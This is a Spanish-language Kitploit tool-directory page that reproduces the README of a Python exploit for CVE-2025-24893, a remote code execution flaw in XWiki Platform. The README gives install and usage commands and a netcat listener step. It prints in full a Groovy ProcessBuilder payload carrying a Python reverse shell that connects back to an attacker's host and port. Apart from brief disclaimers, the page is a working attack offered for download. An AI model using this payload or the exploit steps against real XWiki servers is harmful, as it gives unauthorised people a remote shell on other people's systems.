Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2025-24893 — Exploit modificado para CVE-2025-24893 | Kitploit
Herramientas/GitHubGitHub/hackersonsteroids/cve-2025-24893
ExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubhackersonsteroids/cve-2025-24893

cve-2025-24893

Exploit modificado para CVE-2025-24893

Ver Repositorio
5hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-24893 Exploit de RCE en XWiki

Exploit Banner

Un script sencillo en Python3 para explotar CVE-2025-24893, una vulnerabilidad de ejecución remota de código en XWiki Platform, usando una macro asíncrona basada en Groovy y un payload de reverse shell configurable.

⚠️ ADVERTENCIA: Esta herramienta se proporciona únicamente con fines educativos y de pruebas autorizadas. El uso no autorizado contra sistemas que no posees o para los que no tienes permiso explícito para probar es ilegal y poco ético.


Table of Contents

  • Características
  • Requisitos
  • Instalación
  • Uso
  • Detección y retroceso de protocolo
  • Payload de Reverse Shell
  • Licencia
  • Descargo de responsabilidad

Características

  • ✅ Detecta automáticamente si el objetivo soporta HTTPS o HTTP
  • ✅ Construye un fragmento de Groovy ProcessBuilder para evitar las peculiaridades de Runtime.exec
  • ✅ Codifica en URL el payload de la macro async+groovy de XWiki
  • ✅ Reverse shell configurable (host + puerto)
  • ✅ Muestra el código de respuesta HTTP para ayudar a verificar la entrega

Requisitos

  • Python 3.6 o superior
  • Biblioteca requests
root@kitploit:~
pip install requests

Instalación

Clona este repositorio:

root@kitploit:~
git clone https://github.com/hackersonsteroids/cve-2025-24893.git
cd cve-2025-24893

Uso

root@kitploit:~
./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
  • <TARGET_DOMAIN> El host de XWiki (por ejemplo, wiki.example.local).

  • <LHOST> La IP de tu máquina atacante (donde se está ejecutando tu listener).

  • <LPORT> El puerto de tu listener (entero).


Ejemplo

  1. Inicia un listener en tu máquina:
root@kitploit:~
nc -lvnp 4444
  1. Ejecuta el exploit:
root@kitploit:~
./exploit.py wiki.vulnerable.local 10.0.0.5 4444
  1. En caso de éxito, revisa tu listener de netcat para ver una shell.

Detección y retroceso de protocolo

Antes de enviar el payload, el script:

  1. Intenta https://<TARGET_DOMAIN>
  2. Recurre a http://<TARGET_DOMAIN> si HTTPS falla
  3. Se cierra si ninguno es accesible

Esto ayuda a garantizar la compatibilidad con implementaciones de protocolo mixto.


Payload de Reverse Shell

Por defecto, el script utiliza un one-liner de Python3:

root@kitploit:~
new ProcessBuilder(
  ['/bin/bash','-c',
   'python3 -c \'import socket,subprocess,os;'
   's=socket.socket();s.connect(("LHOST",LPORT));'
   'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
   'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
).redirectErrorStream(true).start()
  • Puedes modificar la función build_payload() si necesitas una shell diferente (por ejemplo, Bash, Perl, PHP, etc.).

Licencia

Este proyecto está licenciado bajo la Licencia MIT. Consulta el archivo LICENSE para más detalles.


Descargo de responsabilidad

Esta herramienta está diseñada únicamente para evaluación de seguridad autorizada y fines educativos. Los autores no se hacen responsables del mal uso. Obtén siempre permiso explícito antes de probar cualquier sistema objetivo.

Descargar herramienta